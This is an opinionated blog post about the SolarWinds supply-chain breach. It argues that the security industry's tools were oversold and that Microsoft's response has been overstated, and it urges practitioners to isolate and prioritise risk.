Look, it's a bad situation.

Lots of IT and Security folks are working really hard right now. That includes people at SolarWinds, Microsoft, your favorite security vendor and companies we depend on every day.

None of what I’m about to say is personal or trying to make anything harder for anyone. Its all hard.

The Reality

But look, it’s a really bad situation.

Let’s say that 450 of the Fortune 500 and dozens of Federal systems were breached. I can think of any number of serious things that any adversary would want that access for.

Notice that none of this is as small as stealing tens or hundreds of millions of dollars or some intellectual property.

At this scale, the potential damage is hard to overstate.

The Security Reality

No seriously, it’s even worse than all of this. From the scant publicly available information, we can infer that hackers were in major networks for 7 months without being really detected.

Did these networks have XDR? Yes. Yes, they did.

Did these networks have next gen firewalls? Yes. Yes, they did.

Did these networks have AI and intrusion detection? Yes. Yes, they did.

Did all of these organizations review their supply chain for security with vendor compliance processes? Yes, they did.

Did these organizations have, among them, the very best the security industry has to offer? Yes. Again, I’m going to say they did. After all, we’re seeing key Federal systems and ~450 of the Fortune 500 impacted.

This is nothing short of a The Emperor’s New Clothes moment for cybersecurity. What were all these tools for? Is it maybe possible that they were oversold?

The Supposed Death Star Response

OK, I mean it’s cool that Microsoft helped sinkhole the DNS (with GoDaddy and others). We’ve seen cases where an individual malware researcher found the C&C domain and disabled it. That doesn’t feel like a major blow.

What about the Windows Defender updates that could find and then automatically disable this malware? Well, sure, but isn’t that their job? That’s the basic idea of Defender—to release updates. It’s actually 7 months too late.

The bottom line is that this piece about Microsoft getting medieval on some hackers is bullshit.

Most of the US cybersecurity system has been owned, and it is a time for humility and a reckoning. I'm asking myself if this article was paid PR trying to sugarcoat the message that - guess what, folks - an entire industry just suffered an epic failure and basically can't be trusted.

Risk

So … what should people do?

Well, I would stop buying SecurityThings™ and start quantifying and isolating risk. This will take people, knowledge, processes and time.

If you assume that everything you have has been compromised, and there is no one thing you can do to secure it, what do you do next?

Start with the information you really need to safeguard or update.

Move on to systems you would need to be able to recreate or bring back online in a new way.

Some things aren’t worth defending. At least not when it is as hard as it is in the real world. I think that line just moved a lot for a lot of companies. Recalibrate.

Hang in there and keep at it. Just think fresh and for yourself. The impact we can make as security practitioners is both evident and in question.

References